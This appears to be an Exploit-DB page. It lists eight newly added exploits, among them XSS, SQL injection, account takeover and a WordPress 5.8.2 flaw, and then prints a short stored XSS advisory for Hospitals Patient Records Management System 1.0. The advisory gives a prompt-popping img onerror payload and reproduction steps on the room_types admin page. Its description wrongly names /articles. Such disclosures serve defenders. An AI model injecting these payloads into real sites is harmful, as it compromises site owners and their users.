
8 changes to exploits/shellcodes Hospitals Patient Records Management System 1.0 - 'room_types' Stored Cross Site Scripting (XSS) Hospitals Patient Records Management System 1.0 - 'room_list' Stored Cross Site Scripting (XSS) Hospitals Patient Records Management System 1.0 - 'doctors' Stored Cross Site Scripting (XSS) SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated) Online Diagnostic Lab Management System 1.0 - Account Takeover (Unauthenticated) Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS) Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated) WordPress Core 5.8.2 - 'WP_Query' SQL Injection
17 lines
No EOL
725 B
Text
17 lines
No EOL
725 B
Text
# Exploit Title: Hospitals Patient Records Management System 1.0 - 'room_types' Stored Cross Site Scripting (XSS)
|
|
# Exploit Author: (Sant268)
|
|
# Vendor Homepage: https://www.sourcecodester.com/
|
|
# Software Link: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
|
|
# Version: HPRMS 1.0
|
|
# Tested on: Ubuntu 20, Apache
|
|
|
|
- Description:
|
|
A XSS issue in HPRMS v.1.0 allows remote attackers to inject JavaScript via /articles in the description parameter.
|
|
|
|
- Payload used:
|
|
<img src =q onerror=prompt(8)>
|
|
|
|
- Steps to reproduce:
|
|
1- Go to http://victim.com/admin/?page=room_types
|
|
2- Add Room type, paste the payload in description
|
|
3- Alert will pop whenever the page is accessed. |